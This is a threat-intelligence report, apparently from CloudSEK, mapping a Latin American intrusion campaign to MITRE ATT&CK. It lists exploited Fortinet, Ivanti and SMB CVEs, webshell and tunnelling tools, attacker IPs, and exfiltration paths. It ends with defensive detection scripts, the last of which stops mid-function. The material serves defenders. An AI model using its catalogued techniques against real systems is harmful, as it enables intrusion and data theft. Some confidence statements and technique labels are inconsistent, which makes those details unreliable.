
Executive Summary

This report documents a coordinated, multi-stage campaign run by a threat actor targeting critical infrastructure across Latin America. Artifacts from the threat actor's staging server reveal a sophisticated operational toolchain spanning all phases of the MITRE ATT&CK framework, from automated reconnaissance through data exfiltration. The campaign is characterised by a proprietary distributed reconnaissance engine (Kimera), a curated exploit armory targeting enterprise perimeter devices (Fortinet, Ivanti, Cisco), portable lateral movement toolkits, and layered command-and-control infrastructure using Neo-reGeorg webshells, Chisel reverse tunnels, and compromised Cisco routers with persistent GRE tunnels.

The threat actor demonstrated capability to operate across Windows and Linux environments, compromise SAP ERP and Oracle database systems for command execution, extract cryptographic material and Active Directory datasets, and maintain long-dwell access through multiple redundant persistence mechanisms. Based on the available information, we have attributed this campaign with medium confidence to MexicanMafia aka PanchoVilla.

Background

Known/Claimed Attacks by Pancho Villa

1. Oaxaca State Police (Secretaría de Seguridad y Protección Ciudadana) — March 2024 Pancho Villa posted on Breach Forums claiming to have exfiltrated 2,935,021 lines of data spanning 2007–2024, totalling over 800MB. The data included names of detained individuals, personal data, and police officer credentials. When the state government denied the breach, Pancho Villa defaced the official Oaxaca government website in the early hours of April 3, 2024, inserting the group's image as proof — where it remained visible until at least 8am that day.

2. "Chilango Leaks" — Mexico City Government (CDMX) — April 2024 Mexican Mafia released 20GB of what they called "Chilango Leaks," which included approximately 2.1 million private emails from over 2,000 CDMX public servant accounts across agencies ranging from the Secretaría de Obras y Servicios to the DIF.

3. UNAM — Instituto de Investigaciones en Matemáticas Aplicadas y en Sistemas (IIMAS) — early 2024 Member "Lord Peña" obtained 2.3 million files from UNAM's IIMAS, including banking data, for which he asked $500.

4. UNAM — Instituto de Investigaciones Filológicas (IIFL) — April 2024 Member "Dyce" hacked UNAM's IIFL and put up for sale a 29GB database claiming to contain network credentials, full names, images, and access keys.

5. SAT (Tax Authority) — Vulnerabilities Disclosed — March/April 2024 Lord Peña disclosed at least three vulnerabilities in the SAT website during the annual personal income tax filing period in 2024.

6. ORFIS Veracruz (Órgano de Fiscalización Superior) — March 2024 Lord Peña listed access to ORFIS internal servers on Breach Forums for $1,500.

7. Estado de México Government — March 2024 Member "Buda" put up for sale a database of subdomains from the State of Mexico government.

8. Quálitas Insurance — June 2024 Pancho Villa claimed to hold 300,000 lines of Quálitas Mexico customer data including names, phone numbers, addresses, and insurance types, offered for sale at $400.

9. PEMEX — July 2024 Mexican Mafia breached servers contracted by PEMEX and obtained over 50 databases with 11,000 records including employee contracts, names, email addresses, and payroll data. The data was initially listed at $1,000, then raised to $2,000 to, as Pancho Villa stated, "push away intelligence researchers."

10. Poder Judicial de la Ciudad de México (PJCDMX) — August 2024 Mexican Mafia compromised the Mexico City Supreme Court, offering 300,000+ user credentials from their appointments and case management system (SICOR/OPC), covering data from 2017 to 2024 including pension claims, legal filings, actuarial assignments, and payment receipts. After a 72-hour ultimatum expired without a sale, they published source code and credentials of 162,439 users, including accounts from UNAM (1,192), IMSS, ISSSTE, SEP, and the FGR. Pancho Villa said the breach took "10 to 15 minutes" due to unpatched legacy systems.

11. Tribunal Superior de Justicia de Oaxaca — October 2024 Mexican Mafia claimed access to over 30 terabytes of data from the Oaxaca Superior Court, including videos of court proceedings that exposed the identities of those involved in legal cases. Pancho Villa framed this as a protest against government neglect of indigenous communities.

Important caveats:

  • The 2025–2026 AI-assisted breach of Mexican government agencies (Gambit Security report) was not attributed to Mexican Mafia, but based on the overlaps, it can be ascertained with high confidence that the threat actor we analyzed is following in the same footsteps.
  • Some claims (especially database sizes) have been disputed or denied by affected institutions, though in several cases (Oaxaca defacement, PJCDMX source code leak) independent verification was possible.

Analysis 

In early 2026, during routine malicious-infrastructure discovery, CloudSEK identified an open directory hosted on 62.171.185[.]97.

Based on the artefacts obtained from the server, we were able to comprehensively map the capabilities of the threat actor.

Attribute Detail
Activity Period 2025–2026
Primary Sectors Government, Tax Authority, Utilities, Transportation, Telecommunications, Financial Services
Geographic Focus Latin America (Mexico primary; Ecuador secondary; Portugal tertiary)
Confirmed Victims Multiple (RCE beacons from ≥5 distinct victim IPs; 407 MB AD dataset exfiltrated; over 1.3 million PII records extracted)
Confidence Level High — based on direct artifact analysis from the threat actor’s staging server

1. Threat Actor Categorization

The threat actor exhibits TTPs consistent with a well-resourced, operationally disciplined group with established infrastructure and custom tooling development capability. The following characteristics are assessed with high confidence from artifact analysis.

1.1 Operational Maturity Indicators

  • Maintains a proprietary distributed reconnaissance framework (Kimera) with parallelised enumeration and automated vulnerability-to-exploitation pipeline
  • Operates a centralised exploit armory with stable, operationally-tested CVE implementations — including custom variants of public PoCs modified to prevent target crashes
  • Conducts on-premise credential cracking on operational infrastructure to avoid exfiltrating encrypted hashes over the internet (OPSEC-aware)
  • Implements per-target proxychains configurations with creation timestamps and operator comments, indicating structured operational documentation
  • Demonstrated capability to compromise network-layer infrastructure (Cisco routers, FortiGate VPNs) in addition to host-level systems
  • Active campaign duration of at least 13 days confirmed by Chisel session logs (3,708 sessions processed)

1.2 Geographic and Sectoral Focus

  • Primary targeting of LATAM government ministries, tax authorities, and utility providers
  • Spanish-language regex patterns in credential harvesting scripts confirm regional operational focus
  • Secondary targeting of telecommunications and aviation infrastructure for network-level access
  • Tertiary activity against a European financial institution (confirmed via Chisel reverse tunnel pivot)

1.3 Motivations Assessment

  • Data theft and PII aggregation at scale (>1.3M records extracted from single transportation provider)
  • Credential and cryptographic material theft enabling impersonation and traffic decryption
  • Active Directory mapping for sustained long-term persistence beyond credential rotation
  • Financial exploitation via compromised procurement workflows and e-commerce platform API key theft
  • Strategic espionage potential through compromise of tax authority SSL private keys and MDM infrastructure

2. MITRE ATT&CK Mapping 

The following table maps all observed techniques to the MITRE ATT&CK Enterprise framework v15. Each row reflects direct artifact evidence from the threat actor's staging server.

Tactic Technique ID Technique Name Observed Procedure / Artifact
Reconnaissance T1595.001 Active Scanning: Scanning IP Blocks High-velocity subdomain enumeration via subfinder, assetfinder, findomain and gobuster with 50 threads; dnsx with 200 threads; naabu port scanning at 5,000 pps against government and aviation targets.
Reconnaissance T1595.002 Active Scanning: Vulnerability Scanning Nuclei fed all discovered URLs, scanning all CVE severity levels; dalfox automated XSS hunting; GeoServer WFS endpoint probing.
Reconnaissance T1592 Gather Victim Host Information httpx with randomized user agents and redirect following to fingerprint live hosts; whatweb technology-stack fingerprinting.
Reconnaissance T1589.001 Gather Victim Identity Information: Credentials Regex-based deep_scan.py extracting AWS keys, JWTs, bearer tokens, Base64 secrets, LDAP strings and SAP credentials from source repositories.
Reconnaissance T1593.002 Search Open Websites/Domains: Search Engines JavaScript endpoint extraction via LinkFinder to uncover hidden APIs and administrative panels.
Reconnaissance T1590.001 Gather Victim Network Information: Domain Properties Subdomain brute-forcing with the SecLists top-1M dictionary; DNS resolution mapping across government and corporate domains.
Resource Development T1587.001 Develop Capabilities: Malware Custom Kimera V1/V2 distributed reconnaissance framework; Xortigate exploit variants; custom SMB protocol handlers (mysmb.py); ZipSlip webshell dropper (mkzip34.py).
Resource Development T1588.006 Obtain Capabilities: Vulnerabilities Pre-staged CVE-specific exploit chains: Fortinet CVE-2022-42475, CVE-2023-27997 and CVE-2024-21762; Ivanti CVE-2023-46805, CVE-2024-21887 and CVE-2025-0282; Zerologon CVE-2020-1472; EternalBlue MS17-010; SMBGhost CVE-2020-0796.
Resource Development T1583.003 Acquire Infrastructure: Virtual Private Server DigitalOcean VPS at 62.171.185.97 used as the primary C2, callback listener, Chisel relay and payload-staging server.
Resource Development T1608.001 Stage Capabilities: Upload Malware Centralized exploit armory on the staging server; chunked payload delivery from chunk_aa through chunk_aj for evasion; pip_chunk staged Python modules.
Initial Access T1190 Exploit Public-Facing Application Fortinet FortiOS SSL-VPN exploitation (CVE-2022-42475 and CVE-2025-0282); Ivanti Connect Secure exploitation (CVE-2023-46805 and CVE-2024-21887); GhostCat Apache Tomcat AJP exploitation (CVE-2020-1938); GeoServer WFS injection; Oracle DBMS_SCHEDULER RCE; SAP RFC abuse.
Initial Access T1133 External Remote Services Credential-based VPN access using cleartext credentials extracted from FortiGate configuration dumps; RDP access via harvested credentials.
Initial Access T1566.002 Phishing: Spearphishing Link Custom phishing pages targeting tax-authority employees and corporate document-management users; credential-harvesting infrastructure.
Initial Access T1190 Exploit Public-Facing Application (SMB) EternalBlue MS17-010 via Metasploit resource scripts; SMBGhost CVE-2020-0796 custom Python tooling.
Execution T1059.004 Command and Scripting Interpreter: Unix Shell DBMS_SCHEDULER shell commands redirected to /tmp; SAP RFC SXPG_CALL_SYSTEM executing OS commands; Bash webshells; bind_shell.py; perl_shell.pl; rev.sh.
Execution T1059.007 Command and Scripting Interpreter: JavaScript GeoServer Runtime.getRuntime() execution via WFS request injection; JSP webshells including status.jsp, ver.jsp and sedema_proc.jsp.
Execution T1059.008 Command and Scripting Interpreter: Network Device CLI Cisco IOS TCL script injection confirming router compromise; programmatic GRE-tunnel configuration via an IOS-XE SSH session.
Execution T1072 Software Deployment Tools SAP RFC function modules SXPG_CALL_SYSTEM and SXPG_COMMAND_INSERT used for authenticated OS-command execution across the SAP ERP environment.
Execution T1203 Exploitation for Client Execution ysoserial CommonsCollections5 Java deserialization payload (payload_wget2.b64) targeting vulnerable Java application servers.
Execution T1569.002 System Services: Service Execution Oracle DBMS_SCHEDULER job-based command execution with a UTL_FILE output-retrieval feedback loop.
Persistence T1505.003 Server Software Component: Web Shell Neo-reGeorg JSPX/JSP webshells with AES-encrypted channels and custom Base64 encoding; PHP webshells (shell.php, ws.php, bt.php); JSP shells; CFM shell; WSDL-based execution interface; ZipSlip dropper embedding xpw3.jsp in malicious archives.
Persistence T1572 Protocol Tunneling Neo-reGeorg SOCKS5 tunnels via HTTP; Chisel reverse-proxy tunnelling TCP over HTTP using an AMD64 ELF binary; GRE tunnel configured on a compromised Cisco router pointing to the attacker VPS.
Persistence T1133 External Remote Services AnyDesk configurations (anydesk_svc.conf and anydesk_usr.conf); RDP configuration files; N-able RMM agent impersonation via crafted LNK files.
Persistence T1546 Event Triggered Execution Malicious ZIP archives created with the mkzip34.py ZipSlip technique, deploying webshells when extracted on victim infrastructure.
Privilege Escalation T1068 Exploitation for Privilege Escalation PwnKit CVE-2021-4034 source, compiled binary, Base64 encoding and chunked delivery; FortiOS heap grooming and memory spray leading to privileged RCE as the VPN process.
Privilege Escalation T1210 Exploitation of Remote Services Zerologon CVE-2020-1472 using repeated Netlogon zero-credential authentication to confirm domain-controller compromise and elevate to Domain Admin.
Privilege Escalation T1078.002 Valid Accounts: Domain Accounts GPP XML artifacts revealing DSSAT domain-admin accounts, including Admin_APS4, SCCMSystemgroup and CMClientPushSrv; use of RCIVIL\maturano credentials for PsExec lateral movement.
Privilege Escalation T1548 Abuse Elevation Control Mechanism Oracle SQL scripts enumerating sudo privileges, writable paths such as /etc, /usr and /var, and cron-job abuse opportunities after execution.
Defense Evasion T1562.003 Impair Defenses: Impair Command History Logging opsec_enum.sh post-exploitation cleanup; StrictHostKeyChecking no and UserKnownHostsFile /dev/null in SSH configurations to suppress forensic artifacts.
Defense Evasion T1036.005 Masquerading: Match Legitimate Name or Location LNK files mimicking the N-able RMM agent, including ApplianceConfig.lnk, CredentialsConfig.lnk and ServerConfig.lnk.
Defense Evasion T1027 Obfuscated Files or Information Base64-encoded payloads including chisel.b64, pwnkit_b64, neo.jspx.b64 and payload.b64; chunked ELF binary delivery; AES-encrypted Neo-reGeorg webshell channel; custom Base64 alphabet.
Defense Evasion T1090.002 Proxy: External Proxy Multi-port SOCKS5 relay on 165.22.184.26 using ports 1080, 5554 and 5571; proxychains configurations for campaign targets; strict-chain DNS-leak prevention.
Defense Evasion T1550.002 Use Alternate Authentication Material: Pass the Hash Impacket psexec.py, wmiexec.py and ntlmrelayx.py in a portable mini_imp/ bundle for credential-free lateral movement.
Defense Evasion T1205 Traffic Signaling WAF-bypass scripts using X-Forwarded-For localhost spoofing (127.0.0.1), Googlebot user-agent impersonation, double URL encoding, null-byte injection and concat operators.
Defense Evasion T1140 Deobfuscate/Decode Files or Information WebLogic AES/3DES/ECB password-decryption scripts; FortiGate AES-CBC configuration decryption using a hardcoded key; Oracle encrypted-credential decryption.
Credential Access T1003.001 OS Credential Dumping: LSASS Memory Impacket secretsdump.py in a portable execution bundle; smb_capture.log showing NTLM-hash interception.
Credential Access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting GetUserSPNs.py from Impacket; kerberoast_tickets.hash containing Kerberoastable service-account hashes.
Credential Access T1552.001 Unsecured Credentials: Credentials in Files FortiGate configuration extraction containing cleartext VPN credentials; pgpass.conf; mssql_pass.txt; cisco_creds.log.
Credential Access T1552.005 Unsecured Credentials: Cloud Instance Metadata API deep_scan.py regex extraction of AWS access keys, Azure secrets and JWT tokens from source-code repositories.
Credential Access T1555.003 Credentials from Password Stores: Credentials from Web Browsers Chrome credential-store collection, including Local State, Login Data and Login Data For Account SQLite databases.
Credential Access T1110.002 Brute Force: Password Spraying aggressive_spray.py, fast_brute.sh and pfsense_brute.py; victim-aware MySQL hash cracking using Spanish-language patterns and organization-specific terms.
Credential Access T1212 Exploitation for Credential Access SAP RFC TH_GREP and RFC_REMOTE_FILE used to read /etc/passwd and /etc/shadow without OS root; PostgreSQL sys_eval used to exfiltrate SSL private keys.
Discovery T1082 System Information Discovery SAP RSPARAM, CHECK_OS and DIR_LIST command execution; Oracle netstat -rn output retrieved through UTL_FILE; recon2.sql OS-level fingerprinting.
Discovery T1016 System Network Configuration Discovery FortiGate configuration dumps containing full network topology, routing tables and internal subnet layouts; Cisco router BGP-neighbour extraction.
Discovery T1018 Remote System Discovery ms17scan.rc scanning the 10.39.x.x subnet; dnsx DNS resolution using 200 threads; naabu port scanning at 5,000 pps.
Discovery T1069.002 Permission Groups Discovery: Domain Groups Impacket Active Directory user enumeration identifying SQL service users, Citrix administrators and CyberArk vault operators from AD logs; GPP XML privilege mapping.
Discovery T1087.002 Account Discovery: Domain Account PasswordLastSet and LastLogon attribute correlation to reconstruct the IT hierarchy; SAP BAPI_USER_GET_DETAIL role and profile enumeration.
Discovery T1135 Network Share Discovery Neo-reGeorg SMB port-445 probing across the 10.8.7.0/24 subnet, targeting seven hosts simultaneously.
Discovery T1526 Cloud Service Discovery VMware AirWatch MDM deployment assessment targeting CVE-2022-22972 authentication bypass.
Discovery T1046 Network Service Discovery naabu port scanning; Oracle rce3.sql validating lateral-movement pathways to Kerberos, SMB, LDAP, SSH and RDP services.
Lateral Movement T1021.002 Remote Services: SMB/Windows Admin Shares PsExec through Metasploit using domain credentials; Impacket psexec.py and smbexec.py in a portable bundle.
Lateral Movement T1021.001 Remote Services: Remote Desktop Protocol default.rdp, users_rdp.txt and pass_rdp.txt used for credential-based RDP movement.
Lateral Movement T1210 Exploitation of Remote Services EternalBlue MS17-010 Metasploit resource scripts targeting 10.39.x.x hosts; SMBGhost CVE-2020-0796 custom payloads; SambaCry targeting Linux and Unix hosts; MS08-067 NetAPI targeting legacy Windows systems.
Lateral Movement T1090.001 Proxy: Internal Proxy SOCKS5 pivot through 165.22.184.26:5571 to internal 10.39.x.x systems; Chisel reverse tunnel creating SOCKS proxies on 127.0.0.1:1080–1081; internal relay node at 10.39.1.204.
Lateral Movement T1080 Taint Shared Content Router-to-router pivot using rt01_telnet_rt02.py; TFTP configuration staging for network-device lateral movement.
Collection T1213 Data from Information Repositories SeedDMS phishing targeting corporate document repositories; Zabbix global-macro extraction yielding cleartext administrative credentials across monitored infrastructure.
Collection T1005 Data from Local System Oracle UTL_FILE reading output files from /tmp; SAP RFC_REMOTE_FILE reading /etc/passwd and /etc/shadow; PostgreSQL lo_import ingesting server certificates.
Collection T1119 Automated Collection dump_batch.sh iterating through Oracle tables in 100,000-row increments; SAP XML bulk-credential extraction; Kimera automated pipeline from discovery to exploitation triage.
Collection T1114 Email Collection Zimbra password extraction through zimbra_passwords.txt; credential harvesting targeting email infrastructure.
Collection T1185 Browser Session Hijacking cors_exploit_poc.html using req.withCredentials=true CORS abuse to hijack authenticated sessions; SAT AMAUTHID session-token extraction.
Command and Control T1071.001 Application Layer Protocol: Web Protocols Neo-reGeorg HTTP POST BLV-encoded C2 channel; reverse shells on ports 80, 443 and 8080 to blend with HTTP and HTTPS traffic; Wget-based callback beacons.
Command and Control T1572 Protocol Tunneling Chisel TCP-over-HTTP tunnels with 3,708 sessions during the campaign; GRE tunnel on a compromised Cisco router to the attacker VPS; SSH-over-SOCKS5 chained tunnelling.
Command and Control T1090.003 Proxy: Multi-hop Proxy Layered architecture using a public VPS, SOCKS5 relay at 165.22.184.26, internal pivot and target subnet; per-target proxychains.conf routing.
Command and Control T1132.002 Data Encoding: Non-Standard Encoding Binary Length Value encoding for the Neo-reGeorg command-and-response channel; custom Base64 alphabet in the webshell.
Command and Control T1001.001 Data Obfuscation: Junk Data AES-encrypted Neo-reGeorg channel key; GZIP-compressed inner payload loaded through reflection with an obfuscated defineClass invocation.
Command and Control T1059.008 Network Device CLI (C2 via Router) TCL script injection on the Cisco router RT01-IBM-PRINCIPAL-IDE; GRE tunnel providing persistent network-level C2 while bypassing host-based detection.
Exfiltration T1048.003 Exfiltration Over Alternative Protocol PostgreSQL sys_eval and Netcat pipeline streaming SSL private keys to 62.171.185.97:8888; Wget POST requests sending system metadata and credentials to the C2.
Exfiltration T1030 Data Transfer Size Limits ELF binary divided into approximately 3.9 KB fragments from chunk_aa through chunk_aj to evade signature-based detection and transfer thresholds.
Exfiltration T1567 Exfiltration Over Web Service SOCKS5-tunnelled exfiltration through 45.61.137.126:7227; Log4Shell JNDI callback exfiltration from 135.237.122.202 to 62.171.185.97:1389.
Exfiltration T1041 Exfiltration Over C2 Channel Oracle CSV spooling to /tmp followed by exfiltration; TFTP pull-based retrieval of network-device configurations; compressed 407 MB BloodHound Active Directory dataset exfiltration.
Impact T1485 Data Destruction MySQL skip-grant-tables injection directly into database configuration, bypassing authentication and enabling unrestricted data manipulation.
Impact T1491 Defacement / Web Content Manipulation ZipSlip archive dropper created with mkzip34.py, embedding a JSP webshell in a path-traversal structure to re-establish access after archive restoration.
Impact T1565.001 Data Manipulation: Stored Data Manipulation SAP SXPG_COMMAND_INSERT used to inject custom OS commands, including ZREDTEAM → whoami; manipulation of procurement workflows through stolen session credentials.

3. Vulnerability Exploitation Arsenal 

The threat actor maintains a curated and operationally-tested exploit collection spanning perimeter devices, Windows SMB services, Linux privilege escalation, and Java application servers. Exploits are customised from public PoCs for operational stability.

CloudSEK Vulnerability Exploitation Table
CVE / Vuln Product Description CVSS Operational Use Kill Chain Stage
CVE-2022-42475 Fortinet FortiOS SSL-VPN Heap-Based Buffer Overflow Critical (9.8) RCE on perimeter VPN devices; custom variant (haggis-42475/) for operational stability Initial Access
CVE-2023-27997 Fortinet FortiOS SSL-VPN Heap Overflow (XORtigate) Critical (9.8) Multiple xortigate variants (v2–v4) with reverse shell payload to C2 Initial Access
CVE-2024-21762 Fortinet FortiOS Out-of-Bounds Write Critical (9.6) exploit_21762.py; reverse shell logs confirming exploitation (forti_revshell.log) Initial Access
CVE-2023-46805 Ivanti Connect Secure Authentication Bypass Critical (9.1) Chained with CVE-2024-21887 for unauthenticated RCE Initial Access
CVE-2024-21887 Ivanti Connect Secure Command Injection Critical (9.1) Chained exploit; compiled binary present Initial Access
CVE-2025-0282 Ivanti Connect Secure Stack Overflow Critical (9.0) Compiled exploit binary staged Initial Access
CVE-2020-1938 Apache Tomcat AJP Protocol LFI/RCE (GhostCat) Critical (9.8) ajpShooter.py targeting exposed AJP connectors Initial Access / Execution
MS17-010 Windows SMB EternalBlue SMBv1 RCE Critical Multiple .rc scripts; confirmed exploitation attempt logs on Windows Storage Server 2008 Lateral Movement
CVE-2020-0796 Windows SMBv3 SMBGhost Memory Corruption Critical (10.0) smbghost_scan.py + smbghost_payload.py; smbghost_shell.log Lateral Movement
CVE-2020-1472 Windows Netlogon Zerologon Domain Escalation Critical (10.0) zerologon_tester.py confirming DC vulnerability before domain takeover Privilege Escalation
CVE-2021-4034 Linux polkit PwnKit pkexec Privilege Escalation High (7.8) Source + binary + base64 + chunked delivery; validates root via id and /etc/shadow read Privilege Escalation
CVE-2020-1206 Windows SMBv3 SMBleed Info Disclosure + ASLR Bypass High (7.5) Chained with SMBGhost for stable RCE Lateral Movement
MS08-067 Windows Server Svc NetAPI Buffer Overflow Critical (10.0) Metasploit .rc scripts targeting legacy Windows nodes Lateral Movement
Log4Shell Apache Log4j JNDI Injection RCE Critical (10.0) LDAP callback listener; confirmed victim JNDI callback (135.237.122.202) Execution / Initial Access
CVE-2022-22972 VMware AirWatch Authentication Bypass Critical (9.8) MDM deployment assessment for mobile device admin access Initial Access

4. Tools, Frameworks and Utilities

The following tools were identified across artifacts. The threat actor deploys both open-source tools and custom-developed frameworks, often packaging open-source tools in portable execution environments to bypass EDR detection on restricted networks.

CloudSEK Tools Table
Tool / Framework | Type | Usage in Campaign | ATT&CK Techniques
Kimera V1/V2 | Custom | Distributed recon: subdomain enum, port scanning, XSS, screenshot, JS extraction | T1595.001, T1595.002
Nuclei | Open Source | Template-based CVE and misconfiguration scanning | T1595.002
Dalfox | Open Source | Automated XSS fuzzing and validation | T1595.002
Subfinder / Assetfinder / Findomain | Open Source | Passive and active subdomain enumeration | T1595.001
naabu | Open Source | High-speed port scanning (5,000 pps) | T1046
dnsx | Open Source | DNS resolution at 200 threads | T1590.001
httpx | Open Source | HTTP probing with UA randomization | T1592
gowitness | Open Source | Headless browser screenshots for recon dossier | T1592
LinkFinder | Open Source | JavaScript endpoint and secret extraction | T1593.002
whatweb | Open Source | Technology stack fingerprinting | T1592
Impacket (mini_imp/) | Open Source (portable) | Lateral movement: psexec, wmiexec, smbexec, secretsdump, GetUserSPNs | T1021.002, T1003.001, T1558.003
Neo-reGeorg | Open Source | HTTP-tunneled SOCKS5 webshell framework (JSPX/JSP/ASPX/PHP/Go/ASHX) | T1505.003, T1572, T1090.001
Chisel | Open Source | TCP-over-HTTP reverse proxy tunnel (Go ELF AMD64) | T1572
Metasploit | Open Source | EternalBlue, SambaCry, MS08-067, PsExec, JMX exploitation | T1210, T1021.002
ysoserial | Open Source | Java deserialization payload generator (CommonsCollections5) | T1203
Hashcat / John | Open Source | On-server credential cracking (SAP, NTLM, MySQL hashes) | T1110
proxychains | Open Source | Traffic routing through SOCKS5 relay chain | T1090.002, T1090.003
BloodHound / SharpHound | Open Source | Active Directory trust and privilege mapping (407 MB dump) | T1069.002, T1087.002
AnyDesk (abused) | Commercial (abused) | Persistent remote access via legitimate RMM software | T1133
N-able (abused) | Commercial (abused) | RMM agent impersonation via crafted LNK files | T1036.005

5. Campaign Kill Chain Narrative 

Phase 0 — Reconnaissance (T1595, T1592, T1590)

The campaign opens with the Kimera distributed footprinting engine executing parallelised subdomain enumeration across targets using four concurrent tools with file descriptor limits removed. dnsx resolves at 200 threads, naabu port-scans at 5,000 packets/second, and httpx fingerprints live hosts with randomised user agents. LinkFinder extracts JavaScript endpoints for hidden API and admin panel discovery. Kimera V2 seamlessly transitions from discovery to automated nuclei scanning and dalfox XSS validation without manual intervention.
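The enumeration rates quoted above (200 DNS threads, 5,000 packets per second) are what a defender can key on. The following Python is an added example written for this write-up, not CloudSEK or actor tooling: a sliding-window detector that, for each source, measures the peak number of distinct DNS names or ip:port targets touched per second and flags sources above a threshold. The event list and the thresholds are constructed assumptions to tune for your own resolver logs or flow records.

```python
"""Sliding-window burst detector for high-concurrency enumeration.

Added example for this write-up, not CloudSEK or actor tooling. Input is a
list of (timestamp, source, kind, target) events that you would derive from
DNS resolver logs or firewall/flow records; the events and thresholds below
are constructed assumptions."""
from collections import defaultdict, deque
from typing import Dict, List, Tuple

Event = Tuple[float, str, str, str]   # (unix ts, source ip, kind, target)

# Assumption: per-second breadth above which a source is treated as a scanner.
# "dns" counts distinct names resolved, "syn" counts distinct ip:port targets.
THRESHOLDS = {"dns": 100, "syn": 1000}


def burst_rates(events: List[Event], window: float = 1.0) -> Dict[Tuple[str, str], Tuple[int, int]]:
    """For every (source, kind) return (max events, max distinct targets) seen in
    any sliding window of `window` seconds."""
    per_key: Dict[Tuple[str, str], List[Tuple[float, str]]] = defaultdict(list)
    for ts, src, kind, target in sorted(events):
        per_key[(src, kind)].append((ts, target))
    rates = {}
    for key, evs in per_key.items():
        q: deque = deque()
        live: Dict[str, int] = defaultdict(int)   # target -> occurrences inside the window
        max_n = max_d = 0
        for ts, tgt in evs:
            q.append((ts, tgt))
            live[tgt] += 1
            while ts - q[0][0] > window:          # expire events older than the window
                _, old_tgt = q.popleft()
                live[old_tgt] -= 1
                if live[old_tgt] == 0:
                    del live[old_tgt]
            max_n = max(max_n, len(q))
            max_d = max(max_d, len(live))
        rates[key] = (max_n, max_d)
    return rates


def flag_scanners(events: List[Event], thresholds=THRESHOLDS, window: float = 1.0) -> List[dict]:
    """Sources whose distinct-target rate reaches the threshold for that kind."""
    findings = []
    for (src, kind), (n, distinct) in burst_rates(events, window).items():
        limit = thresholds.get(kind)
        if limit is not None and distinct >= limit:
            findings.append({"src": src, "kind": kind,
                             "events_per_window": n, "distinct_targets": distinct})
    return sorted(findings, key=lambda f: (f["src"], f["kind"]))


def constructed_events() -> List[Event]:
    """Constructed sample: one host resolving 300 names in under a second and
    sweeping 2,500 ports in half a second, one host doing ordinary lookups."""
    ev: List[Event] = []
    ev += [(1000.0 + i / 300, "10.0.5.23", "dns", f"host{i}.example.test") for i in range(300)]
    ev += [(1000.0 + i / 5000, "10.0.5.23", "syn", f"203.0.113.10:{i + 1}") for i in range(2500)]
    ev += [(1000.0 + 2.0 * i, "10.0.5.50", "dns", "mail.example.test") for i in range(5)]
    return ev


if __name__ == "__main__":
    for f in flag_scanners(constructed_events()):
        print(f"{f['src']} {f['kind']}: {f['distinct_targets']} distinct targets/s")
```

Distinct targets rather than raw event counts is the measure here, because a busy but legitimate resolver client repeats the same names, whereas subdomain brute-forcing and port sweeps touch a new target with nearly every packet.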

Phase 1 — Initial Access (T1190, T1133, T1566)

Primary entry is achieved via exploitation of internet-facing VPN and application servers. FortiGate SSL-VPN devices are targeted via CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762 chains, with multiple xortigate variants tuned for operational stability. Ivanti Connect Secure is targeted via the CVE-2023-46805/CVE-2024-21887 authentication bypass and command injection chain. Apache Tomcat AJP connectors are exploited via GhostCat (CVE-2020-1938). Where direct exploitation is not viable, cleartext credentials extracted from FortiGate configuration dumps enable legitimate VPN authentication. Spear-phishing infrastructure is maintained in parallel for credential harvesting.

Phase 2 — Execution (T1059, T1072, T1569)

Code execution is achieved through multiple application-layer substrates: Oracle DBMS_SCHEDULER jobs execute OS commands with UTL_FILE feedback loops; SAP RFC SXPG_CALL_SYSTEM provides authenticated command execution after credential validation via STFC_CONNECTION; GeoServer WFS request parsing triggers Java Runtime.getRuntime() execution confirmed via out-of-band callbacks; ysoserial CommonsCollections5 payloads target unpatched Java application servers. Multiple webshell variants (PHP, JSP, CFM, WSDL) provide redundant execution paths.

Phase 3 — Persistence (T1505, T1572, T1133)

Neo-reGeorg webshells with AES-encrypted channels and custom base64 encoding provide primary persistent web access. Chisel reverse tunnels (3,708 sessions over campaign period) maintain network-layer connectivity. GRE tunnels are programmatically configured on compromised Cisco routers pointing to the attacker VPS, providing network-device-level persistence invisible to host-based detection. AnyDesk and N-able RMM are abused for additional remote access. ZipSlip archives ensure webshell re-deployment upon data restoration.
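Router-level persistence of this kind shows up in the running-config rather than on any host. As an added example (written for this write-up, not CloudSEK's or the actor's code), the Python below parses the interface Tunnel blocks of a Cisco IOS/IOS-XE configuration and reports GRE tunnels whose destination lies outside the organisation's own prefixes, or that carry no description. The configuration excerpt, the TEST-NET destination standing in for an attacker VPS, and TRUSTED_PREFIXES are constructed assumptions.

```python
"""Audit a Cisco IOS / IOS-XE running-config for GRE tunnel interfaces that
terminate outside the organisation's own address space.

Added example for this write-up, not CloudSEK or actor tooling. The config
text is constructed; TRUSTED_PREFIXES is an assumption to replace with the
prefixes you actually own or peer with."""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumption: tunnel endpoints inside these prefixes are expected; anything else is reviewed.
TRUSTED_PREFIXES = [ipaddress.ip_network(p) for p in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass
class TunnelIface:
    name: str
    mode: str = "gre ip"                 # IOS default when no 'tunnel mode' line is present
    source: Optional[str] = None
    destination: Optional[str] = None
    description: Optional[str] = None
    commands: List[str] = field(default_factory=list)


def parse_tunnels(config: str) -> List[TunnelIface]:
    """Collect every 'interface TunnelN' block with its tunnel sub-commands."""
    tunnels: List[TunnelIface] = []
    current: Optional[TunnelIface] = None
    for raw in config.splitlines():
        if not raw.startswith(" "):      # any top-level line ('!' or a command) ends the block
            m = re.match(r"interface\s+(Tunnel\d+)\s*$", raw, re.IGNORECASE)
            current = TunnelIface(m.group(1)) if m else None
            if current is not None:
                tunnels.append(current)
            continue
        if current is None:
            continue
        cmd = raw.strip()
        current.commands.append(cmd)
        if cmd.startswith("tunnel mode "):
            current.mode = cmd[len("tunnel mode "):]
        elif cmd.startswith("tunnel source "):
            current.source = cmd.split(None, 2)[2]
        elif cmd.startswith("tunnel destination "):
            current.destination = cmd.split(None, 2)[2]
        elif cmd.startswith("description "):
            current.description = cmd[len("description "):]
    return tunnels


def is_trusted(endpoint: str) -> bool:
    try:
        ip = ipaddress.ip_address(endpoint)
    except ValueError:
        return False                     # a hostname cannot be checked offline: review it
    return any(ip in net for net in TRUSTED_PREFIXES)


def suspicious_tunnels(config: str) -> List[dict]:
    """GRE tunnels whose destination is outside TRUSTED_PREFIXES, plus undocumented ones."""
    findings = []
    for t in parse_tunnels(config):
        reasons = []
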